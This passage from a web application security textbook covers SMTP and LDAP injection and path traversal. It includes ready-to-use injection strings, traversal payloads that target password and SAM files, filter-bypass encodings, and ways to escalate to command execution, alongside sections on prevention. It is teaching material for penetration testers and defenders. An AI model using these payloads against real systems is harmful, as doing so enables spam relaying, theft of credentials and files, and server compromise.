Any input that does not match the white list should be rejected, not sanitized.

Injecting into SMTP

Many applications contain a facility for users to submit messages via the appli-

cation; for example, to report a problem to support personnel or provide feed-

back about the web site. This facility is usually implemented by interfacing with

a mail (or SMTP) server. Typically, user-supplied input will be inserted into the

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 321

SMTP conversation that the application server conducts with the mail server. If

an attacker can submit suitable crafted input that is not filtered or sanitized, he

may be able to inject arbitrary STMP commands into this conversation.

In most cases, the application will enable you to specify the contents of the

message and your own email address (which is inserted into the From field of

the resulting email). You may also be able to specify the subject of the message

and other details. Any relevant field that you control may be vulnerable to

SMTP injection.

SMTP injection vulnerabilities are often exploited by spammers who scan

the Internet for vulnerable mail forms and use these to generate large volumes

of nuisance email.

Email Header Manipulation

Consider the form shown in Figure 9-7, which allows users to send feedback

about the application.

Figure 9-7: A typical site feedback form

Here, users can specify a From address and the contents of the message. The

application passes this input to the PHP

mail() command, which constructs

the email and performs the necessary SMTP conversation with its configured

mail server. The mail generated is as follows:

To: [email protected]

From: [email protected]

Subject: Site problem

Confirm Order page doesn’t load

The PHP mail() command uses an additional_headers parameter to set

the From address for the message. This parameter is also used to specify other

headers, including Cc and Bcc, by separating each required header with a

newline character. Hence, an attacker can cause the message to be sent to arbi-

trary recipients by injecting one of these headers into the From field, as illus-

trated in Figure 9-8.

322 Chapter 9 ■ Injecting Code

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 322

Figure 9-8: An email header injection attack

This causes the mail() command to generate the following message:

To: [email protected]

From: [email protected]

Bcc: [email protected]

Subject: Site problem

Confirm Order page doesn’t load

SMTP Command Injection

In other cases, the application may perform the SMTP conversation itself, or

may pass user-supplied input to a different component in order to do this. In

this situation, it may be possible to inject arbitrary SMTP commands directly

into this conversation, potentially taking full control of the messages being

generated by the application.

For example, consider an application that uses requests of the following

form to submit site feedback:

POST feedback.php HTTP/1.1

Host: wahh-app.com

Content-Length: 56

[email protected]&Subject=Site+feedback&Message=foo

This causes the web application to perform an SMTP conversation with the

following commands:

MAIL FROM: [email protected]

RCPT TO: [email protected]

DATA

From: [email protected]

To: [email protected]

Subject: Site feedback

foo

Chapter 9 ■ Injecting Code 323

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 323

NOTE After the SMTP client issues the DATA command, it sends the contents

of the email message, comprising the message headers and body, and then

sends a single dot character on its own line. This tells the server that the

message is complete, and the client can then issue further SMTP commands, to

send further messages.

In this situation, you may be able to inject arbitrary SMTP commands into

any of the email fields that you control. For example, you can attempt to inject

into the Subject field as follows:

POST feedback.php HTTP/1.1

Host: wahh-app.com

Content-Length: 266

[email protected]&Subject=Site+feedback%0d%0afoo%0d%0a%2e%0d

%0aMAIL+FROM:[email protected]%0d%0aRCPT+TO:+john@wahh-mail

.com%0d%0aDATA%0d%0aFrom:[email protected]%0d%0aTo:+john@wahh-mail

.com%0d%0aSubject:+Cheap+V1AGR4%0d%0aBlah%0d%0a%2e%0d%0a&Message=foo

If the application is vulnerable, then this will result in the following SMTP

conversation, which generates two different email messages, with the second

being entirely within your control:

MAIL FROM: [email protected]

RCPT TO: [email protected]

DATA

From: [email protected]

To: [email protected]

Subject: Site+feedback

foo

MAIL FROM: [email protected]

RCPT TO: [email protected]

DATA

From: [email protected]

To: [email protected]

Subject: Cheap V1AGR4

Blah

foo

Finding SMTP Injection Flaws

To probe an application’s mail functionality effectively, you need to target

every parameter that is submitted to an email-related function, even those that

may initially appear to be unrelated to the content of the generated message.

324 Chapter 9 ■ Injecting Code

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 324

Chapter 9 ■ Injecting Code 325

You should also test for each kind of attack, and you should perform each test

case using both Windows and Unix-style newline characters.

HACK STEPS

■ You should submit each of the following test strings as each parameter in

turn, inserting your own email address at the relevant position:

%0aDATA%0afoo%0a%2e%0aMAIL+FROM:+<youremail>%0aRCPT+TO:+<y

ouremail>%0aDATA%0aFrom:+<youremail>%0aTo:+<youremail>%0aS

ubject:+test%0afoo%0a%2e%0a

%0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+<youremail>%0

d%0aRCPT+TO:+<youremail>%0d%0aDATA%0d%0aFrom:+<youremail>%

0d%0aTo:+<youremail>%0d%0aSubject:+test%0d%0

afoo%0d%0a%2e%0d%0a

■ Note any error messages returned by the application. If these appear to

relate to any problem in the email function, investigate whether you

need to fine-tune your input to exploit a vulnerability.

■ The application’s responses may not indicate in any way whether a vul-

nerability exists or was successfully exploited. You should monitor the

email address you specified to see if any mails are received.

■ Review closely the HTML form that generates the relevant request. This

may contain clues regarding the server-side software being used. It may

also contain a hidden or disabled field that is used specify the To address

of the email, which you can modify directly.

TIP Functions to send emails to application support personnel are frequently

regarded as peripheral and may not be subject to the same security standards

or testing as the main application functionality. Also, because they involve

interfacing to an unusual back-end component, they are often implemented via

a direct call to the relevant operating system command. Hence, in addition to

probing for SMTP injection, you should also review all email-related

functionality very closely for OS command injection flaws.

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 325

Preventing SMTP Injection

SMTP injection vulnerabilities can usually be prevented by implementing rig-

orous validation of any user-supplied data that is passed to an email function

or used in an SMTP conversation. Each item should be validated as strictly as

possible given the purpose for which it is being used:

■■

Email addresses should be checked against a suitable regular expres-

sion (which should of course reject any newline characters).

■■

The message subject should not contain any newline characters, and

may be subjected to a suitable length limit.

■■

If the contents of a message are being used directly in an SMTP conver-

sation, then lines containing just a single dot should be disallowed.

Injecting into LDAP

The Lightweight Directory Access Protocol (LDAP) is used for accessing direc-

tory services over a network. A directory is a hierarchically organized data

store that may contain any kind of information but is commonly used to store

personal data such as names, telephone numbers, email addresses, and job

functions. An example of such a directory is the Active Directory used within

Windows domains. You are most likely to encounter LDAP being used in cor-

porate intranet-based web applications, such as an HR application that allows

users to view and modify information about employees.

Consider a simple application function that enables users to search

for employee contact details by specifying an employee name, as shown in

Figure 9-9.

Figure 9-9: An LDAP-based directory search function

326 Chapter 9 ■ Injecting Code

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 326

When a user supplies the search term GUILL, the application performs the

following LDAP query:

<LDAP://ldapserver>;(givenName=GUILL);cn,telephoneNumber,department

This query contains two key elements:

■■

The search filter: givenName=GUILL

■■

The attributes to be returned: cn,telephoneNumber,department

In this situation, it is possible for an attacker to supply a crafted search term

that interferes with one or both of these elements, to modify the information

returned by the query.

Injecting Query Attributes

To retrieve other attributes in the query’s results, you must first terminate the

brackets that encapsulate the search filter and then specify the additional

attributes that you desire. For example, supplying

GUILL);mail,cn;

results in the query

<LDAP://ldapserver>;(givenName=GUILL);mail,cn;);cn,telephoneNumber,

department

which returns an additional column containing the user’s email address, as

shown in Figure 9-10.

Figure 9-10: Injecting an additional query attribute

Chapter 9 ■ Injecting Code 327

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 327

Note the additional column containing the bogus attribute name cn;);cn.

The LDAP query attributes are specified in a comma-delimited list, so every-

thing between the first and second comma is treated as an attribute name.

Note also that Active Directory will return an error if a completely arbitrary

attribute name is specified; however, it tolerates invalid names that start with

an actually valid name followed by a semicolon, hence the need to specify

cn;

after the injected string.

Going further, you can specify any number of fields to be returned in the

results, and you can also specify an asterisk as the main search filter, which

functions as a wildcard. For example, supplying

*);cn,l,co,st,c,mail,cn;

will return all of these fields for every user, as shown in Figure 9-11.

Figure 9-11: An attack to retrieve all information in the directory

Modifying the Search Filter

In some situations, the user-supplied input is not used directly as the entire

value of the search filter but is embedded in a more complex filter. For exam-

ple, if the user performing the search is only allowed to view the details of

employees based in France, the application might perform the following

query:

<LDAP://ldapserver>;(&(givenName=GUILL)(c=FR));cn,telephoneNumber,depart

ment,c

328 Chapter 9 ■ Injecting Code

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 328

This uses the & operator to combine two conditions — the first controlled by

the user and the second preset by the application. Supplying the search term

will return the details of all users based in France. However, supplying the

string

*));cn,cn;

causes the application to make the following query:

<LDAP://ldapserver>;(&(givenName=*));cn,cn;)(c=FR));cn,telephoneNumber,d

epartment,c

which subverts the application’s original logic, removing the (c=FR) condition

from the search filter, thus returning the results of all users in all countries, as

shown in Figure 9-12.

Figure 9-12: A successful attack to subvert the intended search filter

Finding LDAP Injection Flaws

Supplying invalid input to an LDAP operation typically does not result in any

informative error message. In general, the evidence available to you in diag-

nosing a vulnerability includes the results returned by a search function, and

the occurrence of an error such as an HTTP 500 status code. Nevertheless, you

can use the following steps to identify an LDAP injection flaw with a degree of

reliability.

Chapter 9 ■ Injecting Code 329

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 329

330 Chapter 9 ■ Injecting Code

HACK STEPS

■ Try entering just the * character as a search term. This character functions

as a wildcard in LDAP, but not in SQL. If a large number of results are

returned, this is a good indicator that you are dealing with an LDAP

query.

■ Try entering a number of closing brackets:

))))))))))

This input will close any brackets enclosing your input, and those that

encapsulate the main search filter itself, resulting in unmatched closing

brackets, thus invalidating the query syntax. If an error results, the

application may well be vulnerable to LDAP injection. (Note that this input

may also break many other kinds of application logic, so this only provides

a strong indicator if you are already confident that you are dealing with an

LDAP query.)

■ Try entering a series of expressions like the following, until no error

occurs, thus establishing the number of brackets you need to close to

control the rest of the query:

*);cn;

*));cn;

*)));cn;

*))));cn;

■ Try adding extra attributes to the end of your input, using commas to

separate each item. Test each attribute in turn — an error message indi-

cates that the attribute is not valid in the present context. Attributes

commonly used in directories queried by LDAP include:

cn,c,mail,givenname,o,ou,dc,l,uid,objectclass,postaladdress,dn,sn

Preventing LDAP Injection

If it is necessary to insert user-supplied input into an LDAP query, this opera-

tion should only be performed on simple items of data that can be subjected to

strict input validation. The user input should be checked against a white list of

acceptable characters, which should ideally include only alphanumeric char-

acters. Characters that may be used to interfere with the LDAP query should

be blocked, including

( ) ; , * | & and =. Any input that does not match the

white list should be rejected, not sanitized.

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 330

Chapter Summary

We have examined a wide range of code injection vulnerabilities, and the prac-

tical steps that you can take to identify and exploit each one. There are many

real-world injection flaws that can be discovered within the first few seconds

of interacting with an application — for example, by entering an apostrophe

into a search box. In other cases, code injection vulnerabilities may be highly

subtle, manifesting themselves in scarcely detectable differences in the appli-

cation’s behavior, or reachable only through a multistage process of submit-

ting and manipulating crafted input.

To be confident that you have uncovered the code injection flaws that exist

within an application, you need to be both thorough and patient. Practically

every type of injection can manifest itself in the processing of practically any

item of user-supplied data, including the names and values of query string

parameters,

POST data and cookies, and other HTTP headers. In many cases, a

defect will emerge only after extensive probing of the relevant parameter, as

you learn exactly what type of processing is being performed on your input

and scrutinize the obstacles that stand in your way.

Faced with the huge potential attack surface presented by code injection vul-

nerabilities, you may feel that any serious assault on an application must entail a

titanic effort. However, part of learning the art of attacking software is to acquire

a sixth sense for where the treasure is hidden and how your target is likely to

open up so that you can steal it. The only way to gain this sense is through prac-

tice, rehearsing the techniques we have described against the real-life applica-

tions you encounter, and seeing how they stand up to them.

Questions

Answers can be found at www.wiley.com/go/webhacker.

1. You are trying to exploit a SQL injection flaw by performing a UNION

attack to retrieve data. You do not know how many columns the origi-

nal query returns. How can you find this out?

2. You have located a SQL injection vulnerability in a string parameter.

You believe the database is either MS-SQL or Oracle but are unable at

this stage to retrieve any data or an error message to confirm which

database is running. How can you find this out?

3. You have submitted a single quotation mark at numerous locations

throughout the application, and from the resulting error messages have

Chapter 9 ■ Injecting Code 331

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 331

diagnosed several potential SQL injection flaws. Which one of the fol-

lowing would be the safest location to test whether more crafted input

has an effect on the application’s processing?

(a) Registering a new user

(b) Updating your personal details

4. You have found a SQL injection vulnerability in a login function, and

you try to use the input

‘ or 1=1-- to bypass the login. Your attack

fails and the resulting error message indicates that the

-- characters are

being stripped by the application’s input filters. How could you cir-

cumvent this problem?

5. You have found a SQL injection vulnerability but have been unable to

carry out any useful attacks because the application rejects any input

containing whitespace. How can you work around this restriction?

6. The application is doubling up all single quotation marks within user

input before these are incorporated into SQL queries. You have found a

SQL injection vulnerability in a numeric field, but you need to use a

string value in one of your attack payloads. How can you place a string

into your query without using any quotation marks?

7. In some rare situations, applications construct dynamic SQL queries out

of user-supplied input in a way that cannot be made safe using parame-

terized queries. When does this occur?

8. You have escalated privileges within an application such that you now

have full administrative access. You discover a SQL injection vulnera-

bility within a user administration function. How can you leverage this

vulnerability to further advance your attack?

9. You are attacking an application that holds no sensitive data, and con-

tains no authentication or access control mechanisms. In this situation,

how should you rank the significance of the following vulnerabilities?

(a) SQL injection

(b) XPath injection

10. You are probing an application function that enables you to search per-

sonnel details. You suspect that the function is accessing either a data-

base or an Active Directory back end. How could you try to determine

which of these is the case?

332 Chapter 9 ■ Injecting Code

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 332

333

Many kinds of functionality oblige a web application to read from or write to

a file system on the basis of parameters supplied within user requests. If these

operations are carried out in an unsafe manner, an attacker can submit crafted

input which causes the application to access files that the application designer

did not intend it to access. Known as path traversal vulnerabilities, such defects

may enable the attacker to read sensitive data including passwords and appli-

cation logs, or to overwrite security-critical items such as configuration files

and software binaries. In the most serious cases, the vulnerability may enable

an attacker to completely compromise both the application and the underlying

operating system.

Path traversal flaws are sometimes subtle to detect, and many web applica-

tions implement defenses against them that may be vulnerable to bypasses.

We will describe all of the various techniques you will need, from identifying

potential targets, to probing for vulnerable behavior, to circumventing the

application’s defenses.

Common Vulnerabilities

Path traversal vulnerabilities arise when user-controllable data is used by the

application to access files and directories on the application server or other

back-end file system in an unsafe way. By submitting crafted input, an attacker

Exploiting Path Traversal

CHAPTER

70779c10.qxd:WileyRed 9/14/07 3:13 PM Page 333

may be able to cause arbitrary content to be read from, or written to, anywhere

on the file system being accessed. This often enables an attacker to read sensi-

tive information from the server, or overwrite sensitive files, leading ulti-

mately to arbitrary command execution on the server.

Consider the following example, in which an application uses a dynamic

page to return static images to the client. The name of the requested image is

specified in a query string parameter:

https://wahh-app.com/scripts/GetImage.aspx?file=diagram1.jpg

When the server processes this request, it performs the following steps:

1. Extracts the value of the

file parameter from the query string.

2. Appends this value to the prefix

C:\wahh-app\images\.

3. Opens the file with this name.

4. Reads the file’s contents and returns it to the client.

The vulnerability arises because an attacker can place path traversal

sequences into the filename in order to backtrack up from the image directory

specified in step 2 and so access files from anywhere on the server. The path

traversal sequence is known as “dot-dot-slash,” and a typical attack would

look like this:

https://wahh-app.com/scripts/GetImage.aspx?file=..\..\windows\repair\sam

When the application appends the value of the file parameter to the name

of the images directory, it obtains the following path:

C:\wahh-app\images\..\..\winnt\repair\sam

The two traversal sequences effectively step back up from the images direc-

tory to the root of the C: drive, and so the preceding path is equivalent to this:

C:\winnt\repair\sam

Hence, instead of returning an image file, the server actually returns the

repair copy of the Windows SAM file. This file may be analyzed by the

attacker to obtain usernames and passwords for the server operating system.

In this simple example, the application implements no defenses to prevent

path traversal attacks. However, because these attacks have been widely

known about for some time, it is common to encounter applications that

implement various defenses against them, often based on input validation fil-

ters. As you will see, these filters are often poorly designed and can be

bypassed by a skilled attacker.

334 Chapter 10 ■ Exploiting Path Traversal

70779c10.qxd:WileyRed 9/14/07 3:13 PM Page 334

Chapter 10 ■ Exploiting Path Traversal 335

Finding and Exploiting Path

Traversal Vulnerabilities

Path traversal vulnerabilities are often subtle and hard to detect, and it may be

necessary to prioritize your efforts on locations within the application that are

most likely to manifest the vulnerability.

Locating Targets for Attack

During your initial mapping of the application, you should already have iden-

tified any obvious areas of attack surface in relation to path traversal vulnera-

bilities. Any functionality whose explicit purpose is uploading or downloading

files should be thoroughly tested. This functionality is often found in workflow

applications where users can share documents, in blogging and auction appli-

cations where users can upload images, and in informational applications

where users can retrieve documents such as ebooks, technical manuals, and

company reports.

In addition to obvious target functionality of this kind, there are various

other types of behavior that may suggest relevant interaction with the file

system.

HACK STEPS

■ Review the information gathered during application mapping to identify:

■

Any instance where a request parameter appears to contain the

name of a file or directory — for example, include=main.inc or

template=/en/sidebar.

■

Any application functions whose implementation is likely to involve

retrieval of data from a server file system (as opposed to a back-end

database) — for example, the displaying of office documents or

images.

■ During all testing which you perform in relation to every other kind of

vulnerability, look for error messages or other anomalous events that are

of interest. Try to find any evidence of instances where user-supplied

data is being passed to file APIs or as parameters to operating system

commands.

NOTE If you have local access to the application (either in a white-box testing

exercise or because you have compromised the server’s operating system),

identifying targets for path traversal testing is usually straightforward, because

you can monitor all file system interaction performed by the application.

70779c10.qxd:WileyRed 9/14/07 3:13 PM Page 335

HACK STEPS

If you have local access to the web application:

■ Use a suitable tool to monitor all file system activity on the server. For

example, the FileMon tool from SysInternals can be used on the Win-

dows platform, the ltrace/strace tools can be used on Linux, and the

truss command can be used on Sun’s Solaris.

■ Test every page of the application by inserting a single unique string (such

as traversaltest) into each submitted parameter (including all cookies,

query string fields, and POST data items). Target only one parameter at a

time, and use the automated techniques described in Chapter 13 to speed

up the process.

■ Set a filter in your file system monitoring tool to identify all file system

events that contain your test string.

■ If any events are identified where your test string has been used as or

incorporated into a file or directory name, test each instance (as described

next) to determine whether it is vulnerable to path traversal attacks.

Detecting Path Traversal Vulnerabilities

Having identified the various potential targets for path traversal testing,

you need to test every instance individually to determine whether user-

controllable data is being passed to relevant file system operations in an

unsafe manner.

For each user-supplied parameter being tested, determine whether traversal

sequences are being blocked by the application or whether they work as

expected. An initial test that is usually reliable is to submit traversal sequences

in a way that does not involve stepping back above the starting directory.

HACK STEPS

■ Working on the assumption that the parameter you are targeting is being

appended to a preset directory specified by the application, modify the

parameter’s value to insert an arbitrary subdirectory and a single traver-

sal sequence. For example, if the application submits the parameter

file=foo/file1.txt

then try submitting the value

file=foo/bar/../file1.txt

336 Chapter 10 ■ Exploiting Path Traversal

70779c10.qxd:WileyRed 9/14/07 3:13 PM Page 336

HACK STEPS (continued)

■ If the application’s behavior is identical in the two cases, then it may be

vulnerable. You should proceed directly to attempting to access a differ-

ent file by traversing above the start directory.

■ If the application’s behavior is different in the two cases, then it may be

blocking, stripping, or sanitizing traversal sequences, resulting in an

invalid file path. You should examine whether there are any ways of cir-

cumventing the application’s validation filters (described in the next sec-

tion “Circumventing Obstacles to Traversal Attacks”).

■ The reason why this test is effective, even if the subdirectory “bar” does

not exist, is that most common file systems perform canonicalization of

the file path before attempting to retrieve it. The traversal sequence can-

cels out the invented directory, and so the server does not check whether

it is present.

If you find any instances where submitting traversal sequences without

stepping above the starting directory does not affect the application’s behav-

ior, the next test is to attempt to traverse out of the starting directory and access

files from elsewhere on the server file system.

HACK STEPS

■ If the application function you are attacking provides read access to a

file, attempt to access a known world-readable file on the operating sys-

tem in question. Submit one of the following values as the filename

parameter you control:

../../../../../../../../../../../../etc/passwd

../../../../../../../../../../../../boot.ini

If you are lucky, your browser will display the contents of the file you have

requested, as in Figure 10-1.

■ If the function you are attacking provides write access to a file, it may be

more difficult to verify conclusively whether the application is vulnerable.

One test that is often effective is to attempt to write two files, one that

ought to be writable by any user, and one which should not be writable

even by root or Administrator. For example, on Windows platforms you

can try:

../../../../../../../../../../../../writetest.txt

../../../../../../../../../../../../windows/system32/config/sam

Continued

Chapter 10 ■ Exploiting Path Traversal 337

70779c10.qxd:WileyRed 9/14/07 3:13 PM Page 337

HACK STEPS (continued)

On Unix-based platforms, files that root may not write are version-

dependent, but attempting to overwrite a directory with a file should

always fail, so you can try:

../../../../../../../../../../../../tmp/writetest.txt

../../../../../../../../../../../../tmp

For each pair of tests, if the application’s behavior is different in response

to the first and second requests (for example, if the second returns an error

message, while the first does not), then it is likely that the application is

vulnerable.

■ An alternative method for verifying a traversal flaw with write access is

to try to write a new file within the web root of the web server and then

attempt to retrieve this with a browser. However, this method may not

work if you do not know the location of the web root directory or the

user context in which the file access occurs does not have permission to

write there.

Figure 10-1: A successful path traversal attack

NOTE Virtually all file systems tolerate redundant traversal sequences which

appear to try and step up above the root of the file system. Hence, it is usually

advisable to submit a large number of traversal sequences when probing for a

338 Chapter 10 ■ Exploiting Path Traversal

70779c10.qxd:WileyRed 9/16/07 4:25 PM Page 338

flaw, as in the examples given here. It is possible that the starting directory to

which your data is appended lies deep within the file system, and so using an

excessive number of sequences helps to avoid false negatives.

Also, the Windows platform tolerates both forward slashes and backslashes as

directory separators, whereas Unix-based platforms tolerate only the forward

slash. Further, some web applications filter one version but not the other. Even

if you are completely certain that the web server is running a Unix-based

operating systen, the application may still be calling out to a Windows-based

back-end component. Because of this, it is always advisable to try both

versions when probing for traversal flaws.

Circumventing Obstacles to Traversal Attacks

If your initial attempts to perform a traversal attack, as described previously,

are unsuccessful, this does not mean that the application is not vulnerable.

Many application developers are aware of path traversal vulnerabilities and

implement various kinds of input validation checks in an attempt to prevent

them. However, those defenses are often flawed and can be bypassed by a

skilled attacker.

The first type of input filter commonly encountered involves checking

whether the filename parameter contains any path traversal sequences, and if

so, either rejects the request or attempts to sanitize the input to remove the

sequences. This type of filter is often vulnerable to various attacks that use

alternative encodings and other tricks to defeat the filter. These attacks all

exploit the type of canonicalization problems faced by input validation mech-

anisms, as described in Chapter 2.

HACK STEPS

■ Always try path traversal sequences using both forward slashes and

backslashes. Many input filters check for only one of these, when the file

system may support both.

■ Try simple URL-encoded representations of traversal sequences, using

the following encodings. Be sure to encode every single slash and dot

within your input:

dot %2e

forward slash %2f

backslash %5c

Continued

Chapter 10 ■ Exploiting Path Traversal 339

70779c10.qxd:WileyRed 9/14/07 3:14 PM Page 339

HACK STEPS (continued)

■ Try using 16-bit Unicode–encoding:

dot %u002e

forward slash %u2215

backslash %u2216

■ Try double URL–encoding:

dot %252e

forward slash %252f

backslash %255c

■ Try overlong UTF-8 Unicode–encoding:

dot %c0%2e %e0%40%ae %c0ae etc.

forward slash %c0%af %e0%80%af %c0%2f etc.

backslash %c0%5c %c0%80%5c etc.

You can use the illegal Unicode payload type within Burp Intruder to

generate a huge number of alternate representations of any given character,

and submit this at the relevant place within your target parameter. These

are representations that strictly violate the rules for Unicode representation

but are nevertheless accepted by many implementations of Unicode

decoders, particularly on the Windows platform.

■ If the application is attempting to sanitize user input by removing traver-

sal sequences, and does not apply this filter recursively, then it may be

possible to bypass the filter by placing one sequence within another. For

example:

....//

....\/

..../\

....\\

The second type of input filter commonly encountered in defenses against

path traversal attacks involves verifying whether the user-supplied filename

contains a suffix (i.e., file type) or prefix (i.e., starting directory) that the appli-

cation is expecting. This type of defense may be used in tandem with the filters

described already.

340 Chapter 10 ■ Exploiting Path Traversal

70779c10.qxd:WileyRed 9/14/07 3:14 PM Page 340

HACK STEPS

■ Some applications check whether the user-supplied filename ends in a

particular file type or set of file types, and reject attempts to access any-

thing else. Sometimes this check can be subverted by placing a URL-

encoded null byte at the end of your requested filename, followed by a

file type that the application accepts. For example:

../../../../../boot.ini%00.jpg

The reason this attack sometimes succeeds is that the file type check

is implemented using an API in a managed execution environment

in which strings are permitted to contain null characters (such as

String.endsWith() in Java). However, when the file is actually retrieved,

the application ultimately uses an API in an unmanaged environment in

which strings are null-terminated and so your filename is effectively

truncated to your desired value.

■ A different attack against file type filtering is to use a URL-encoded new-

line character. Some methods of file retrieval (usually on Unix-based

platforms) may effectively truncate your filename when a newline is

encountered:

../../../../../etc/passwd%0a.jpg

■ Some applications attempt to control the file type being accessed by

appending their own file type suffix to the filename supplied by the user.

In this situation, either of the preceding exploits may be effective, for the

same reasons.

■ Some applications check whether the user-supplied filename starts with

a particular subdirectory of the start directory, or even a specific file-

name. This check can of course be trivially bypassed as follows:

wahh-app/images/../../../../../../../etc/passwd

■ If none of the preceding attacks against input filters are successful indi-

vidually, it may be that the application is implementing multiple types of

filters, and so you need to combine several of these attacks simultane-

ously (both against traversal sequence filters and file type or directory fil-

ters). If possible, the best approach here is to try to break the problem

down into separate stages. For example, if the request for

diagram1.jpg

Continued

Chapter 10 ■ Exploiting Path Traversal 341

70779c10.qxd:WileyRed 9/14/07 3:14 PM Page 341

HACK STEPS (continued)

is successful, but the request for

foo/../diagram1.jpg

fails, then try all of the possible traversal sequence bypasses until a

variation on the second request is successful. If these successful traversal

sequence bypasses don’t enable you to access /etc/passwd, probe

whether any file type filtering is implemented and can be bypassed, by

requesting

diagram1.jpg%00.jpg

Working entirely within the start directory defined by the application, try to

probe to understand all of the filters being implemented, and see whether

each can be bypassed individually with the techniques described.

■ Of course, if you have white box access to the application, then your task

is much easier, because you can systematically work through different

types of input and verify conclusively what filename (if any) is actually

reaching the file system.

Coping with Custom Encoding

Probably the craziest path traversal bug that the authors have encountered

involved a custom encoding scheme for filenames that were ultimately han-

dled in an unsafe way, and demonstrated how obfuscation provides no substi-

tute for security.

The application contained some workflow functionality that enabled users

to upload and download files. The request performing the upload supplied a

filename parameter that was vulnerable to a path traversal attack when writ-

ing the file. When a file had been successfully uploaded, the application pro-

vided users with a URL to download it again. There were two important

caveats:

■■

The application verified whether the file to be written already existed,

and if so, refused to overwrite it.

■■

The URLs generated for downloading users’ files were represented

using a bespoke obfuscation scheme — this appeared to be a cus-

tomized form of Base64-encoding, in which a different character set was

employed at each position of the encoded filename.

342 Chapter 10 ■ Exploiting Path Traversal

70779c10.qxd:WileyRed 9/14/07 3:14 PM Page 342

Taken together, these caveats presented a barrier to straightforward

exploitation of the vulnerability. First, although it was possible to write arbi-

trary files to the server file system, it was not possible to overwrite any exist-

ing file, and the low privileges of the web server process meant that it was not

possible to create a new file in any interesting locations. Second, it was not pos-

sible to request an arbitrary existing file (such as

/etc/passwd) without reverse

engineering the custom encoding, which presented a lengthy and unappealing

challenge.

A little experimentation revealed that the obfuscated URLs contained the

original filename string supplied by the user. For example:

■■

test.txt became zM1YTU4NTY2Y.

■■

foo/../test.txt became E1NzUyMzE0ZjQ0NjMzND.

The difference in length of the encoded URLs indicated that no path canon-

icalization had been performed before applying the encoding. This behavior

gave us enough of a toe-hold to exploit the vulnerability. The first step was to

submit a file with the following name:

../../../../../.././etc/passwd/../../tmp/foo

which in its canonical form is equivalent to

/tmp/foo

and so could be written by the web server. Uploading this file produced a

download URL containing the following obfuscated filename:

FhwUk1rNXFUVEJOZW1kNlRsUk5NazE2V1RKTmFrMHdUbXBWZWs1NldYaE5lb

To modify this value to return the file /etc/passwd, we simply needed to

truncate it at the right point, which is

FhwUk1rNXFUVEJOZW1kNlRsUk5NazE2V1RKTmFrM

Attempting to download a file using this value returned the server’s passwd

file as expected. The server had given us sufficient resources to be able to

encode arbitrary file paths using its scheme, without even deciphering the

obfuscation algorithm being used!

NOTE The observant may have noticed the appearance of a redundant ./ in

the name of our uploaded file. This was necessary to ensure that our truncated

URL ended on a 3-byte boundary of clear text, and therefore on a 4-byte

boundary of encoded text, in line with the Base64-encoding scheme. Truncating

an encoded URL partway through an encoded block would almost certainly

cause an error when decoded on the server.

Chapter 10 ■ Exploiting Path Traversal 343

70779c10.qxd:WileyRed 9/14/07 3:14 PM Page 343

Exploiting Traversal Vulnerabilities

Having identified a path traversal vulnerability that provides read or write

access to arbitrary files on the server’s file system, what kind of attacks can

you carry out by exploiting these? In most cases, you will find that you have

the same level of read/write access to the file system as the web server process

does.

HACK STEPS

■ You can exploit read-access path traversal flaws to retrieve interesting

files from the server that may contain directly useful information or help

you to refine attacks against other vulnerabilities. For example:

■

Password files for the operating system and application.

■

Server and application configuration files, to discover other vulnerabil-

ities or fine-tune a different attack.

■

Include files that may contain database credentials.

■

Data sources used by the application, such as MySQL database files or

XML files.

■

The source code to server-executable pages, to perform a code

review in search of bugs (for example GetImage.aspx?file=

GetImage.aspx).

■

Application log files that may contain usernames and session tokens,

and the like.

■ If you find a path traversal vulnerability that grants write access, your

main goal should be to exploit this to achieve arbitrary execution of com-

mands on the server. Means of exploiting the vulnerability to achieve this

include:

■

Creating scripts in users’ startup folders.

■

Modifying files such as in.ftpd to execute arbitrary commands when

a user next connects.

■

Writing scripts to a web directory with execute permissions and calling

them from your browser.

Preventing Path Traversal Vulnerabilities

By far the most effective means of eliminating path traversal vulnerabilities is

to avoid passing user-submitted data to any file system API. In many cases,

including the original example

GetImage.aspx?file=diagram1.jpg, it is

344 Chapter 10 ■ Exploiting Path Traversal

70779c10.qxd:WileyRed 9/14/07 3:14 PM Page 344

entirely unnecessary for an application to do this. For most files that are not

subject to any access control, the files can simply be placed within the web root

and accessed via a direct URL. If this is not possible, the application can main-

tain a hard-coded list of image files that may be served by the page, and use a

different identifier to specify which file is required, such as an index number.

Any request containing an invalid identifier can be rejected, and there is no

attack surface for users to manipulate the path of files delivered by the page.

In some cases, as with the workflow functionality that allows file uploading

and downloading, it may be desirable to allow users to specify files by name,

and developers may decide that the easiest way to implement this is by pass-

ing the user-supplied filename to file system APIs. In this situation, the appli-

cation should take a defense-in-depth approach to place several obstacles in

the way of a path traversal attack.

Here are some examples of defenses that may be used; ideally, as many of

these as possible should be implemented together:

■■

After performing all relevant decoding and canonicalization of the user-

submitted filename, the application should check whether this contains

either of the path traversal sequences (using backward or forward

slashes) or any null bytes. If so, the application should stop processing

the request. It should not attempt to perform any sanitization on the

malicious filename.

■■

The application should use a hard-coded list of permissible file types

and reject any request for a different type (after the preceding decoding

and canonicalization has been performed).

■■

After performing all of its filtering on the user-supplied filename, the

application should use suitable file system APIs to verify that nothing is

amiss, and that the file to be accessed using that filename is located

within the start directory specified by the application.

In Java, this can be achieved by instantiating a

java.io.File object

using the user-supplied filename and then calling the

getCanonicalPath

method on this object. If the string returned by this method does not

begin with the name of the start directory, then the user has somehow

bypassed the application’s input filters, and the request should be

rejected.

In ASP.NET, this can be achieved by passing the user-supplied filename

to the

System.Io.Path.GetFullPath method and checking the returned

string in the same way as described for Java.

■■

The application can mitigate the impact of most exploitable path traver-

sal vulnerabilities by using a

chrooted environment to access the direc-

tory containing the files to be accessed. In this situation, the

chrooted

Chapter 10 ■ Exploiting Path Traversal 345

